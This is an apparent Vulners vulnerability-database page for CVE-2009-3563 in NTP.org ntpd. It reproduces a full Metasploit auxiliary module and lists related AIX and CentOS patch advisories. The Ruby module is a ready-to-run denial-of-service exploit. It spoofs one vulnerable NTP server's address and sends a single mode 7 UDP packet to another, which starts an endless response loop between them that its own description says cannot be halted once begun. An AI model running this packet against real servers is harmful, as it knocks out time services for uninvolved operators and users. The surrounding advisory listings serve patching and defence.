Lucene search
+L

NTP.org ntpd Reserved Mode Denial of Service

🗓️ 13 Dec 2009 02:56:20Reported by todb <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 73 Views

NTP.org ntpd Reserved Mode Denial of Service module exploits a vulnerability in the NTP demon by creating an infinite response loop between two vulnerable servers

Related
Code
ReporterTitlePublishedViews
Family
nessus
AIX 5.3 TL 8 : xntpd (IZ68659)
24 Jan 201300:00
nessus
nessus
AIX 6.1 TL 4 : xntpd (IZ71071)
24 Jan 201300:00
nessus
nessus
AIX 5.3 TL 9 : xntpd (IZ71093)
24 Jan 201300:00
nessus
nessus
AIX 5.3 TL 10 : xntpd (IZ71608)
24 Jan 201300:00
nessus
nessus
AIX 5.3 TL 11 : xntpd (IZ71610)
24 Jan 201300:00
nessus
nessus
AIX 6.1 TL 1 : xntpd (IZ71611)
24 Jan 201300:00
nessus
nessus
AIX 6.1 TL 2 : xntpd (IZ71613)
24 Jan 201300:00
nessus
nessus
AIX 6.1 TL 3 : xntpd (IZ71614)
24 Jan 201300:00
nessus
nessus
AIX 5.3 TL 8 : bos.net.tcp.client (U832257)
19 May 201000:00
nessus
nessus
CentOS 4 / 5 : ntp (CESA-2009:1648)
9 Dec 200900:00
nessus
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Capture
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NTP.org ntpd Reserved Mode Denial of Service',
      'Description'    => %q{
        This module exploits a denial of service vulnerability
        within the NTP (network time protocol) demon. By sending
        a single packet to a vulnerable ntpd server (Victim A),
        spoofed from the IP address of another vulnerable ntpd server
        (Victim B), both victims will enter an infinite response loop.
        Note, unless you control the spoofed source host or the real
        remote host(s), you will not be able to halt the DoS condition
        once begun!
      },
      'Author'         => [ 'todb' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'BID', '37255' ],
          [ 'CVE', '2009-3563' ],
          [ 'OSVDB', '60847' ],
          [ 'URL', 'https://bugs.ntp.org/show_bug.cgi?id=1331' ]
        ],
      'DisclosureDate' => '2009-10-04'))

      register_options(
        [
          OptAddressLocal.new('LHOST', [true, "The spoofed address of a vulnerable ntpd server" ])
        ])
      deregister_options('FILTER','PCAPFILE')

  end

  def run_host(ip)
    open_pcap

    print_status("Sending a mode 7 packet to host #{ip} from #{datastore['LHOST']}")

    p = PacketFu::UDPPacket.new
    p.ip_saddr = datastore['LHOST']
    p.ip_daddr = ip
    p.ip_ttl = 255
    p.udp_src = 123
    p.udp_dst = 123
    p.payload = ["\x17", "\x97\x00\x00\x00"][rand(2)]
    p.recalc
    capture_sendto(p,ip)

    close_pcap
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Feb 2022 23:22Current
6.8Medium risk
Vulners AI Score6.8
CVSS 26.4
EPSS0.32288
73